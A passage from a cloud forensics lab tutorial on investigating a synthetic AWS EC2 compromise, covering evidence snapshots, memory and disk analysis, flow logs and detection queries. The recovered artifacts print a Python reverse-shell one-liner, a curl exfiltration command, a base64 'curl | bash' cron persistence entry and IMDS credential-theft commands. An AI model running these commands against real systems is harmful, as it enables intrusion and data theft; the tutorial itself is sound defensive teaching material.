{Key=EvidenceType,Value=disk-image},
{Key=SourceInstance,Value=i-0a1b2c3d4e5f6789a},
{Key=SourceVolume,Value=vol-0a1b2c3d4e5f0002},
{Key=AcquiredBy,Value=forensic-analyst},
{Key=Classification,Value=CONFIDENTIAL},
{Key=DoNotDelete,Value=true}
]' \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"SnapshotId": "snap-0a1b2c3d4e5f0002",
"VolumeId": "vol-0a1b2c3d4e5f0002",
"State": "pending",
"VolumeSize": 200,
"StartTime": "2026-03-24T16:31:05.000Z",
"Encrypted": true
}
# Monitor snapshot progress
$ aws ec2 describe-snapshots \
--snapshot-ids snap-0a1b2c3d4e5f0001 snap-0a1b2c3d4e5f0002 \
--profile forensics \
--region us-east-1 \
--query 'Snapshots[].{Id:SnapshotId,State:State,Progress:Progress,Size:VolumeSize}'
# SYNTHETIC OUTPUT:
[
{"Id": "snap-0a1b2c3d4e5f0001", "State": "completed", "Progress": "100%", "Size": 50},
{"Id": "snap-0a1b2c3d4e5f0002", "State": "completed", "Progress": "100%", "Size": 200}
]
# Protect snapshots from deletion with EBS Snapshot Lock
# (governance mode blocks DeleteSnapshot until the lock duration expires;
# repeat for snap-0a1b2c3d4e5f0002)
$ aws ec2 lock-snapshot \
--snapshot-id snap-0a1b2c3d4e5f0001 \
--lock-mode governance \
--lock-duration 90 \
--profile forensics \
--region us-east-1
echo "[+] Forensic snapshots created and protected"
echo "[+] snap-0a1b2c3d4e5f0001 (root, 50 GB)"
echo "[+] snap-0a1b2c3d4e5f0002 (data, 200 GB)"
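Forensic snapshots are only defensible if their case metadata survives with them, so a pre-flight check that the required tags are present catches mistakes before evidence handling continues. A sketch using the tagging scheme above (the tag-key set is from this lab's convention, not an AWS requirement):

```python
# Validate that an EC2-style tag list carries the forensic case metadata
# used in the snapshot commands above.

REQUIRED_TAGS = {"CaseId", "EvidenceType", "SourceInstance",
                 "SourceVolume", "AcquiredBy", "Classification"}

def missing_forensic_tags(tags: list[dict]) -> set:
    """tags: EC2-style [{'Key': ..., 'Value': ...}] list; returns missing keys."""
    present = {t["Key"] for t in tags}
    return REQUIRED_TAGS - present

# SYNTHETIC partial tag list — four required keys are absent
tags = [
    {"Key": "CaseId", "Value": "QFS-IR-2026-0042"},
    {"Key": "EvidenceType", "Value": "disk-image"},
]
print(sorted(missing_forensic_tags(tags)))
# ['AcquiredBy', 'Classification', 'SourceInstance', 'SourceVolume']
```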
Step 2.2: Memory Acquisition Using SSM Run Command¶
# ============================================================
# Step 2.2: Volatile Memory Acquisition via SSM + AVML
# Captures RAM contents before they are lost
# ============================================================
# IMPORTANT: Memory acquisition is time-sensitive.
# The longer you wait, the more evidence degrades.
# Use SSM Run Command to avoid SSH (which would alter evidence).
# Step 1: Deploy AVML (Acquire Volatile Memory for Linux) via SSM
$ aws ssm send-command \
--instance-ids i-0a1b2c3d4e5f6789a \
--document-name "AWS-RunShellScript" \
--comment "FORENSIC: Case QFS-IR-2026-0042 Memory Acquisition" \
--parameters '{
"commands": [
"#!/bin/bash",
"# FORENSIC MEMORY ACQUISITION — Case QFS-IR-2026-0042",
"# All data is SYNTHETIC",
"",
"# Create forensic output directory",
"mkdir -p /tmp/forensic-evidence",
"",
"# Download AVML (Acquire Volatile Memory for Linux)",
"# In production, pre-stage AVML in a trusted S3 bucket",
"curl -L -o /tmp/avml https://github.com/microsoft/avml/releases/download/v0.14.0/avml",
"chmod +x /tmp/avml",
"",
"# Record pre-acquisition metadata",
"echo \"=== SYSTEM INFO ===\" > /tmp/forensic-evidence/pre-acquisition.txt",
"date -u >> /tmp/forensic-evidence/pre-acquisition.txt",
"uname -a >> /tmp/forensic-evidence/pre-acquisition.txt",
"cat /proc/meminfo >> /tmp/forensic-evidence/pre-acquisition.txt",
"ps aux >> /tmp/forensic-evidence/pre-acquisition.txt",
"netstat -tlnp >> /tmp/forensic-evidence/pre-acquisition.txt",
"ss -tlnp >> /tmp/forensic-evidence/pre-acquisition.txt",
"",
"# Acquire memory dump",
"/tmp/avml /tmp/forensic-evidence/memory.lime",
"",
"# Generate SHA-256 hash of memory dump",
"sha256sum /tmp/forensic-evidence/memory.lime > /tmp/forensic-evidence/memory.lime.sha256",
"",
"# Compress and upload to forensic S3 bucket",
"pigz -k /tmp/forensic-evidence/memory.lime",
"aws s3 cp /tmp/forensic-evidence/memory.lime.gz s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz",
"aws s3 cp /tmp/forensic-evidence/memory.lime.sha256 s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.sha256",
"aws s3 cp /tmp/forensic-evidence/pre-acquisition.txt s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-pre-acquisition.txt",
"",
"# Record completion",
"echo \"Memory acquisition complete: $(date -u)\"",
"echo \"Memory dump size: $(ls -lh /tmp/forensic-evidence/memory.lime | awk '{print $5}')\"",
"echo \"SHA-256: $(cat /tmp/forensic-evidence/memory.lime.sha256)\""
]
}' \
--timeout-seconds 600 \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"Command": {
"CommandId": "cmd-0a1b2c3d4e5f6789a",
"InstanceIds": ["i-0a1b2c3d4e5f6789a"],
"Comment": "FORENSIC: Case QFS-IR-2026-0042 Memory Acquisition",
"Status": "InProgress",
"RequestedDateTime": "2026-03-24T16:35:00.000Z"
}
}
# Check command status
$ aws ssm get-command-invocation \
--command-id cmd-0a1b2c3d4e5f6789a \
--instance-id i-0a1b2c3d4e5f6789a \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"Status": "Success",
"StandardOutputContent": "Memory acquisition complete: Tue Mar 24 16:42:33 UTC 2026\nMemory dump size: 16G\nSHA-256: b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3  /tmp/forensic-evidence/memory.lime",
"StandardErrorContent": ""
}
# Download the memory dump and its hash manifest to the forensic workstation
$ aws s3 cp \
s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz \
~/cloud-dfir-lab24/evidence/aws/memory/ \
--profile forensics
$ aws s3 cp \
s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.sha256 \
~/cloud-dfir-lab24/evidence/aws/memory/ \
--profile forensics
# Integrity note: the recorded SHA-256 covers the UNCOMPRESSED memory.lime,
# so re-run sha256sum against the dump after decompressing it in Step 2.3
# and compare with the value recorded at acquisition time
$ cat ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime.sha256
# b2c3d4e5f6a1b2c3d4e5f6a1... /tmp/forensic-evidence/memory.lime (SYNTHETIC hash)
echo "[+] Memory acquisition complete — 16 GB memory dump acquired"
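`sha256sum -c` performs this check natively; restating it in Python makes explicit what is being compared: the recomputed digest of the local file against the hex digest recorded at acquisition time. A self-contained sketch (paths and file contents are illustrative stand-ins for the real dump):

```python
# Verify a file against a sha256sum-style '<hexdigest>  <name>' manifest line.
import hashlib
import os
import tempfile

def verify_sha256(path: str, manifest_line: str) -> bool:
    expected = manifest_line.split()[0]
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):  # stream 1 MiB chunks
            digest.update(chunk)
    return digest.hexdigest() == expected

# Demo against a throwaway file standing in for the downloaded dump
fd, path = tempfile.mkstemp()
os.close(fd)
with open(path, "wb") as f:
    f.write(b"synthetic memory image bytes")
line = hashlib.sha256(b"synthetic memory image bytes").hexdigest() + "  memory.lime"
print(verify_sha256(path, line))  # True
os.remove(path)
```

Streaming in fixed-size chunks keeps memory use flat even for multi-gigabyte memory images.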
Step 2.3: Memory Analysis with Volatility3¶
# ============================================================
# Step 2.3: Analyze Memory Dump with Volatility3
# Look for attacker processes, network connections, injected code
# ============================================================
# Decompress the memory dump
$ pigz -d ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz
# Identify the OS profile
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
banners.Banners
# SYNTHETIC OUTPUT:
# Volatility 3 Framework 2.5.2
# Offset Banner
# 0x5a000000 Linux version 5.15.0-1056-aws (buildd@lcy02-amd64-086)
# (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0) #61-Ubuntu SMP
# List all running processes
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.pslist.PsList
# SYNTHETIC OUTPUT:
# PID PPID COMM OFFSET
# 1 0 systemd 0x888800001000
# 2 0 kthreadd 0x888800002000
# ...
# 1842 1 nginx 0x888810042000
# 1843 1842 nginx 0x888810043000
# 1844 1842 nginx 0x888810044000
# 2156 1 node 0x888820056000
# 2890 1 sshd 0x888830078000
# 3401 2890 sshd 0x888840090000
# 3402 3401 bash 0x888840091000
# 3450 3402 python3 0x8888400a2000 <-- SUSPICIOUS
# 3451 3450 curl 0x8888400a3000 <-- SUSPICIOUS
# 3678 1 cron 0x888850010000
# 4012 3678 sh 0x888860020000
# 4013 4012 base64 0x888860021000 <-- SUSPICIOUS
# 4201 1 amazon-ssm-agen 0x888870030000
# Check network connections
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.sockstat.Sockstat
# SYNTHETIC OUTPUT:
# PID Protocol Local Address Remote Address State
# 1842 TCP 10.100.1.15:80 0.0.0.0:0 LISTEN
# 1842 TCP 10.100.1.15:443 0.0.0.0:0 LISTEN
# 2156 TCP 10.100.1.15:3000 0.0.0.0:0 LISTEN
# 3450 TCP 10.100.1.15:45678 203.0.113.42:4443 ESTABLISHED <-- C2
# 3451 TCP 10.100.1.15:45679 198.51.100.99:443 ESTABLISHED <-- EXFIL
# 2890 TCP 10.100.1.15:22 0.0.0.0:0 LISTEN
# FINDING: Process 3450 (python3) has an ESTABLISHED connection to the
# attacker IP 203.0.113.42 on port 4443 — this is a reverse shell or C2 channel
# Extract suspicious process command lines
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.psaux.PsAux | grep -E "345[0-1]|401[2-3]"
# SYNTHETIC OUTPUT:
# 3450 3402 python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('203.0.113.42',4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"
# 3451 3450 curl -s https://198.51.100.99/exfil --data-binary @/tmp/.staging/customer_export.csv.gz
# 4012 3678 sh -c 'echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo" | base64 -d | bash'
# 4013 4012 base64 -d
# CRITICAL FINDINGS FROM MEMORY:
# 1. PID 3450: Python reverse shell connecting to 203.0.113.42:4443
# 2. PID 3451: curl exfiltrating data to 198.51.100.99
# 3. PID 4012: Cron job executing base64-encoded command (persistence)
# 4. The encoded command decodes to: curl -s https://198.51.100.99/c2 | bash
# Extract the bash history from memory
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.bash.Bash
# SYNTHETIC OUTPUT:
# PID Command Time Command
# 3402 2026-03-24 15:55:30.000000 whoami
# 3402 2026-03-24 15:55:35.000000 id
# 3402 2026-03-24 15:55:40.000000 uname -a
# 3402 2026-03-24 15:56:00.000000 cat /etc/passwd
# 3402 2026-03-24 15:56:15.000000 ls -la /opt/qfs-api/
# 3402 2026-03-24 15:56:30.000000 cat /opt/qfs-api/.env
# 3402 2026-03-24 15:57:00.000000 env | grep -i aws
# 3402 2026-03-24 15:57:15.000000 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# 3402 2026-03-24 15:57:22.000000 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/qfs-api-role
# 3402 2026-03-24 15:58:00.000000 mkdir -p /tmp/.staging
# 3402 2026-03-24 15:58:15.000000 psql -h db01.quantumfinancial.example.com -U apiuser -d qfs_prod -c "COPY (SELECT * FROM customers LIMIT 50000) TO STDOUT WITH CSV HEADER" > /tmp/.staging/customer_export.csv
# 3402 2026-03-24 15:59:00.000000 gzip /tmp/.staging/customer_export.csv
# 3402 2026-03-24 15:59:30.000000 python3 -c "import socket,subprocess,os;..."
# 3402 2026-03-24 16:00:00.000000 (crontab -l; echo "*/5 * * * * echo 'Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo' | base64 -d | bash") | crontab -
# 3402 2026-03-24 16:01:00.000000 curl -s https://198.51.100.99/exfil --data-binary @/tmp/.staging/customer_export.csv.gz
Critical Findings from Memory Analysis
The attacker (via SSM Session Manager at 15:55 UTC):
- Harvested EC2 instance role credentials from the IMDS metadata service (169.254.169.254)
- Read application secrets from /opt/qfs-api/.env (environment variables with database credentials)
- Exfiltrated customer data -- exported 50,000 records from the PostgreSQL database to CSV
- Established a reverse shell to 203.0.113.42:4443 using Python
- Installed persistence via cron job that polls a C2 server every 5 minutes
- Exfiltrated compressed data to 198.51.100.99 via HTTPS
All IPs, credentials, and data are 100% SYNTHETIC.
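Decoding the persistence payload recovered from PID 4012 confirms exactly what the cron job executes. The encoded string is the SYNTHETIC payload from the `psaux` output above:

```python
# Decode the base64 cron payload recovered from process memory.
import base64

payload = "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo"
decoded = base64.b64decode(payload).decode()
print(decoded)  # curl -s https://198.51.100.99/c2 | bash
```

Decode attacker payloads on an isolated analysis host, and never pipe the result into a shell.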
Step 2.4: Disk Image Mounting and Analysis¶
# ============================================================
# Step 2.4: Mount EBS Snapshot as Volume for Disk Forensics
# Read-only mounting preserves evidence integrity
# ============================================================
# Create a volume from the forensic snapshot in a forensic AZ
$ aws ec2 create-volume \
--snapshot-id snap-0a1b2c3d4e5f0001 \
--availability-zone us-east-1a \
--volume-type gp3 \
--tag-specifications 'ResourceType=volume,Tags=[
{Key=CaseId,Value=QFS-IR-2026-0042},
{Key=Purpose,Value=forensic-analysis},
{Key=DoNotDelete,Value=true}
]' \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"VolumeId": "vol-forensic-0a1b2c3d",
"Size": 50,
"SnapshotId": "snap-0a1b2c3d4e5f0001",
"AvailabilityZone": "us-east-1a",
"State": "creating"
}
# Attach to the forensic workstation instance (EBS attachments are always
# read-write at the block level, so read-only must be enforced at mount time)
$ aws ec2 attach-volume \
--volume-id vol-forensic-0a1b2c3d \
--instance-id i-forensic-workstation \
--device /dev/xvdz \
--profile forensics \
--region us-east-1
# On the forensic workstation — mount read-only
# CRITICAL: Always mount forensic evidence read-only; for ext4, add
# "noload" so the journal is not replayed (replay would modify the volume)
$ sudo mkdir -p /mnt/forensic-evidence/root-vol
$ sudo mount -o ro,noload,noexec,nosuid,nodev /dev/xvdz1 /mnt/forensic-evidence/root-vol
# Verify read-only mount
$ mount | grep forensic
# /dev/xvdz1 on /mnt/forensic-evidence/root-vol type ext4 (ro,noload,noexec,nosuid,nodev)
# ---- Disk Forensic Analysis ----
# Check for recently modified files during the attack window
$ sudo find /mnt/forensic-evidence/root-vol -newermt "2026-03-24 14:00" \
-not -path "*/proc/*" -not -path "*/sys/*" \
-type f -ls 2>/dev/null | sort -k9 | head -30
# SYNTHETIC OUTPUT:
# 131073 4 -rw-r--r-- 1 root root 856 Mar 24 15:57 /mnt/forensic-evidence/root-vol/opt/qfs-api/.env.bak
# 262144 8 -rw-r--r-- 1 ubuntu ubuntu 4096 Mar 24 15:58 /mnt/forensic-evidence/root-vol/tmp/.staging/customer_export.csv.gz
# 393216 4 -rwxr-xr-x 1 root root 2048 Mar 24 16:00 /mnt/forensic-evidence/root-vol/tmp/.staging/.update.sh
# 524288 4 -rw------- 1 ubuntu ubuntu 512 Mar 24 16:00 /mnt/forensic-evidence/root-vol/var/spool/cron/crontabs/ubuntu
# 655360 12 -rw-r--r-- 1 root root 12288 Mar 24 15:55 /mnt/forensic-evidence/root-vol/var/log/auth.log
# 786432 4 -rw-r--r-- 1 root root 1024 Mar 24 16:01 /mnt/forensic-evidence/root-vol/tmp/.staging/.c2_config
# Examine the malicious cron entry
$ sudo cat /mnt/forensic-evidence/root-vol/var/spool/cron/crontabs/ubuntu
# SYNTHETIC OUTPUT:
# # DO NOT EDIT THIS FILE
# # (cron installed on Tue Mar 24 16:00:00 2026)
# */5 * * * * echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo" | base64 -d | bash
# Decode the base64 payload
$ echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo" | base64 -d
# curl -s https://198.51.100.99/c2 | bash
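When triaging many crontabs from an image, the decode-and-flag step above can be scripted; a minimal sketch that matches the echo-base64-bash pattern seen in this entry (the regex and function name are illustrative):

```python
import base64
import re

# Flag cron entries that echo a base64 blob into `base64 -d | bash`
# and recover the hidden command
SUSPICIOUS = re.compile(
    r'echo\s+"([A-Za-z0-9+/=]{16,})"\s*\|\s*base64\s+-d\s*\|\s*(?:bash|sh)')

def decode_cron_payloads(crontab_text):
    """Return decoded payloads from any base64-piped cron entries."""
    return [base64.b64decode(m.group(1)).decode("utf-8", "replace")
            for m in SUSPICIOUS.finditer(crontab_text)]

# Entry recovered from the evidence volume (synthetic)
entry = ('*/5 * * * * echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo"'
         ' | base64 -d | bash')
print(decode_cron_payloads(entry))
# → ['curl -s https://198.51.100.99/c2 | bash']
```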
# Examine the hidden C2 configuration file
$ sudo cat /mnt/forensic-evidence/root-vol/tmp/.staging/.c2_config
# SYNTHETIC OUTPUT:
# [c2]
# server = 203.0.113.42
# port = 4443
# protocol = tcp
# beacon_interval = 300
# jitter = 0.2
# exfil_server = 198.51.100.99
# exfil_port = 443
# exfil_protocol = https
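Since the recovered .c2_config is INI-formatted, Python's configparser can pull out blockable IOCs directly; a small sketch with the field names copied from the synthetic file above (the helper name is illustrative):

```python
import configparser

# The recovered .c2_config is INI-formatted (contents are synthetic)
C2_CONFIG = """\
[c2]
server = 203.0.113.42
port = 4443
protocol = tcp
beacon_interval = 300
jitter = 0.2
exfil_server = 198.51.100.99
exfil_port = 443
exfil_protocol = https
"""

def extract_iocs(raw):
    """Pull blockable network IOCs out of the recovered C2 config."""
    cfg = configparser.ConfigParser()
    cfg.read_string(raw)
    c2 = cfg["c2"]
    return {
        "c2": f"{c2['server']}:{c2['port']}/{c2['protocol']}",
        "exfil": f"{c2['exfil_server']}:{c2['exfil_port']}/{c2['exfil_protocol']}",
        "beacon_seconds": c2.getint("beacon_interval"),
    }

print(extract_iocs(C2_CONFIG))
# → {'c2': '203.0.113.42:4443/tcp', 'exfil': '198.51.100.99:443/https', 'beacon_seconds': 300}
```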
# Generate timeline with plaso/log2timeline
$ sudo log2timeline.py \
--storage-file ~/cloud-dfir-lab24/timeline/ec2-root-vol.plaso \
/mnt/forensic-evidence/root-vol
# Convert plaso output to CSV timeline
$ psort.py \
--output-time-zone UTC \
-o l2tcsv \
-w ~/cloud-dfir-lab24/timeline/ec2-root-vol-timeline.csv \
~/cloud-dfir-lab24/timeline/ec2-root-vol.plaso \
"date > '2026-03-24 14:00:00' AND date < '2026-03-25 00:00:00'"
$ echo "[+] Disk forensics complete — timeline generated"
Step 2.5: VPC Flow Logs Analysis¶
# ============================================================
# Step 2.5: VPC Flow Logs — Network Forensics
# Identify lateral movement and data exfiltration flows
# ============================================================
# Query VPC Flow Logs via CloudWatch Logs Insights
$ aws logs start-query \
--log-group-name "vpc-flow-logs-prod" \
--start-time $(date -d "2026-03-24" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string '
fields @timestamp, srcAddr, dstAddr, srcPort, dstPort,
protocol, packets, bytes, action
| filter srcAddr = "10.100.1.15" or dstAddr = "10.100.1.15"
| filter dstAddr like /^203\.0\.113\./ or
dstAddr like /^198\.51\.100\./ or
srcAddr like /^203\.0\.113\./ or
srcAddr like /^198\.51\.100\./
| sort @timestamp asc
| limit 200' \
--profile forensics
# start-query returns a queryId; retrieve results once the query completes:
$ aws logs get-query-results --query-id <queryId> --profile forensics
# SYNTHETIC Flow Log Results — External Connections from Compromised Instance:
# @timestamp srcAddr dstAddr srcPort dstPort proto packets bytes action
# 2026-03-24 15:55:10 203.0.113.42 10.100.1.15 48231 22 TCP 12 2048 ACCEPT
# 2026-03-24 15:59:30 10.100.1.15 203.0.113.42 45678 4443 TCP 156 32768 ACCEPT
# 2026-03-24 16:00:00 203.0.113.42 10.100.1.15 4443 45678 TCP 48 8192 ACCEPT
# 2026-03-24 16:01:00 10.100.1.15 198.51.100.99 45679 443 TCP 2847 45678912 ACCEPT
# 2026-03-24 16:01:30 198.51.100.99 10.100.1.15 443 45679 TCP 312 16384 ACCEPT
# 2026-03-24 16:05:00 10.100.1.15 198.51.100.99 45680 443 TCP 1523 23456789 ACCEPT
# 2026-03-24 16:15:00 10.100.1.15 198.51.100.99 45681 443 TCP 3012 89012345 ACCEPT
# Data volume analysis — how much data was exfiltrated?
# SYNTHETIC calculation:
# Flow 1 (16:01): 45,678,912 bytes = ~43.6 MB
# Flow 2 (16:05): 23,456,789 bytes = ~22.4 MB
# Flow 3 (16:15): 89,012,345 bytes = ~84.9 MB
# Total outbound to 198.51.100.99: 158,148,046 bytes = ~150.8 MB
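The byte arithmetic above is easy to reproduce and extend to larger flow sets; a minimal sketch with the byte counts copied from the synthetic flow records (note "MB" here means MiB, i.e. 1,048,576 bytes, matching the calculation above):

```python
MIB = 1024 * 1024

# (timestamp, bytes) for the three outbound flows to 198.51.100.99 (synthetic)
flows = [
    ("2026-03-24T16:01", 45678912),
    ("2026-03-24T16:05", 23456789),
    ("2026-03-24T16:15", 89012345),
]

total_bytes = sum(size for _, size in flows)
for ts, size in flows:
    print(f"{ts}  {size / MIB:7.1f} MB")
print(f"Total outbound: {total_bytes:,} bytes ({total_bytes / MIB:.1f} MB)")
```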
# Query for internal lateral movement from compromised host
$ aws logs start-query \
--log-group-name "vpc-flow-logs-prod" \
--start-time $(date -d "2026-03-24" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string '
fields @timestamp, srcAddr, dstAddr, srcPort, dstPort,
protocol, packets, bytes, action
| filter srcAddr = "10.100.1.15"
| filter dstAddr like /^10\.100\./
| filter dstPort in [22, 5432, 3306, 445, 3389, 5985, 5986]
| sort @timestamp asc
| limit 100' \
--profile forensics
# Retrieve with: aws logs get-query-results --query-id <queryId> --profile forensics
# SYNTHETIC OUTPUT — Lateral Movement Detected:
# @timestamp srcAddr dstAddr srcPort dstPort proto action
# 2026-03-24 15:58:00 10.100.1.15 10.100.3.10 52341 5432 TCP ACCEPT
# 2026-03-24 16:10:00 10.100.1.15 10.100.2.20 52342 22 TCP ACCEPT
# 2026-03-24 16:20:00 10.100.1.15 10.100.2.30 52343 22 TCP ACCEPT
# FINDING: Compromised host connected to:
# - 10.100.3.10:5432 (PostgreSQL database — data exfiltration source)
# - 10.100.2.20:22 and 10.100.2.30:22 (SSH lateral movement to app tier)
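A short triage sketch can label each flow by target service, using the same port list the query filters on (flow tuples copied from the synthetic output; the port-to-service map is an illustrative assumption):

```python
# Commonly-abused lateral-movement ports, mirroring the dstPort filter above
LATERAL_PORTS = {22: "SSH", 5432: "PostgreSQL", 3306: "MySQL", 445: "SMB",
                 3389: "RDP", 5985: "WinRM-HTTP", 5986: "WinRM-HTTPS"}

# (timestamp, dstAddr, dstPort) from the synthetic flow results
flows = [
    ("2026-03-24T15:58", "10.100.3.10", 5432),
    ("2026-03-24T16:10", "10.100.2.20", 22),
    ("2026-03-24T16:20", "10.100.2.30", 22),
]

# Group connections by destination and service to summarize the pivot targets
targets = {}
for ts, dst, port in flows:
    service = LATERAL_PORTS.get(port, "unknown")
    targets.setdefault(f"{dst}:{port} ({service})", []).append(ts)
for target, times in targets.items():
    print(f"{target}: {len(times)} connection(s)")
```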
Step 2.6: S3 Access Log Analysis¶
# ============================================================
# Step 2.6: S3 Access Logs — Data Exfiltration Detection
# Analyze access patterns on the data lake bucket
# ============================================================
# Download S3 access logs for the data lake bucket
$ aws s3 sync \
s3://qfs-s3-access-logs-123456789012/qfs-datalake-prod-123456789012/ \
~/cloud-dfir-lab24/evidence/aws/s3-access/ \
--profile forensics \
--exclude "*" \
--include "2026-03-24*"
# Parse S3 access logs for the compromised user
$ cat ~/cloud-dfir-lab24/evidence/aws/s3-access/2026-03-24* | \
grep "dev-jenkins-ci" | \
awk '{print $3, $4, $5, $8, $9, $10, $11, $12, $13}' | \
head -20
# SYNTHETIC OUTPUT:
# [24/Mar/2026:15:05:00 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT customers/export/2026/customers_full.csv.gz 200 - 45678912
# [24/Mar/2026:15:05:15 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT customers/export/2026/customers_pii.csv.gz 200 - 23456789
# [24/Mar/2026:15:05:30 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT transactions/2026/Q1/transactions_summary.parquet 200 - 89012345
# [24/Mar/2026:15:10:22 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT compliance/reports/sox_audit_2026.xlsx 200 - 5234567
# [24/Mar/2026:15:12:00 +0000] qfs-datalake-prod-123456789012 dev-jenkins-ci GET.OBJECT customers/export/2026/accounts_balances.csv.gz 200 - 67890123
# Summarize exfiltrated data
$ python3 << 'PYEOF'
# SYNTHETIC — S3 access log analysis summary
exfiltrated_files = [
{"file": "customers/export/2026/customers_full.csv.gz", "size_bytes": 45678912, "type": "PII"},
{"file": "customers/export/2026/customers_pii.csv.gz", "size_bytes": 23456789, "type": "PII"},
{"file": "transactions/2026/Q1/transactions_summary.parquet", "size_bytes": 89012345, "type": "Financial"},
{"file": "compliance/reports/sox_audit_2026.xlsx", "size_bytes": 5234567, "type": "Compliance"},
{"file": "customers/export/2026/accounts_balances.csv.gz", "size_bytes": 67890123, "type": "Financial"},
]
total_bytes = sum(f["size_bytes"] for f in exfiltrated_files)
print("=" * 77)
print("S3 DATA EXFILTRATION SUMMARY")
print("Case: QFS-IR-2026-0042 | ALL DATA IS SYNTHETIC")
print("=" * 77)
print(f"\n{'File':<55} {'Size':>10} {'Type':<12}")
print("-" * 77)
for f in exfiltrated_files:
size_mb = f["size_bytes"] / (1024 * 1024)
print(f"{f['file']:<55} {size_mb:>7.1f} MB {f['type']:<12}")
print("-" * 77)
print(f"{'TOTAL':<55} {total_bytes / (1024*1024):>7.1f} MB")
print(f"\nFiles accessed: {len(exfiltrated_files)}")
print(f"Data categories: PII, Financial, Compliance")
print(f"Regulatory impact: GDPR, SOX, PCI DSS notification required")
PYEOF
Exercise 2 Detection Queries¶
// -----------------------------------------------------------------
// Detection: EC2 Instance Metadata Service (IMDS) Credential Theft
// MITRE: T1552.005 — Unsecured Credentials: Cloud Instance Metadata
// -----------------------------------------------------------------
// Detects instance-role credentials being used from source IPs other than
// the instance's own, the hallmark of credentials stolen via the IMDS endpoint
AWSCloudTrail
| where TimeGenerated > ago(24h)
| where EventSource == "ec2.amazonaws.com"
| where EventName in ("DescribeInstances", "RunInstances")
| where UserIdentityType == "AssumedRole"
| where UserIdentityArn contains "i-0a1b2c3d4e5f6789a" // role session name = instance ID
| where SourceIpAddress !in ("10.100.2.50", "10.50.1.10")
| project TimeGenerated, EventName, UserIdentityArn, SourceIpAddress,
UserAgent, RequestParameters
// -----------------------------------------------------------------
// Detection: Unusual S3 Data Download Volume (Exfiltration)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
AWSS3AccessLogs
| where TimeGenerated > ago(24h)
| where Operation == "REST.GET.OBJECT"
| where HTTPStatus == 200
| summarize
TotalBytes = sum(ObjectSize),
FileCount = count(),
UniqueKeys = dcount(Key),
Files = make_set(Key, 20)
by Requester, BucketName, bin(TimeGenerated, 1h)
| where TotalBytes > 50000000 // > 50 MB per hour
| extend TotalMB = round(TotalBytes / 1048576.0, 1)
| project TimeGenerated, Requester, BucketName, TotalMB, FileCount,
UniqueKeys, Files
| order by TotalMB desc
// -----------------------------------------------------------------
// Detection: VPC Flow — Large Outbound Data Transfer
// MITRE: T1048 — Exfiltration Over Alternative Protocol
// -----------------------------------------------------------------
AWSVPCFlow
| where TimeGenerated > ago(24h)
| where FlowDirection == "O"
| where not(ipv4_is_private(DstAddr)) // excludes all RFC 1918 ranges
| summarize
TotalBytes = sum(Bytes),
TotalPackets = sum(Packets),
ConnectionCount = count(),
DestPorts = make_set(DstPort)
by SrcAddr, DstAddr, bin(TimeGenerated, 15m)
| where TotalBytes > 10000000 // > 10 MB in 15 minutes
| extend TotalMB = round(TotalBytes / 1048576.0, 1)
| project TimeGenerated, SrcAddr, DstAddr, TotalMB, TotalPackets,
ConnectionCount, DestPorts
| order by TotalMB desc
// -----------------------------------------------------------------
// Detection: EC2 Instance Metadata Service (IMDS) Credential Theft
// MITRE: T1552.005 — Unsecured Credentials: Cloud Instance Metadata
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
eventSource="ec2.amazonaws.com"
(eventName="DescribeInstances" OR eventName="RunInstances")
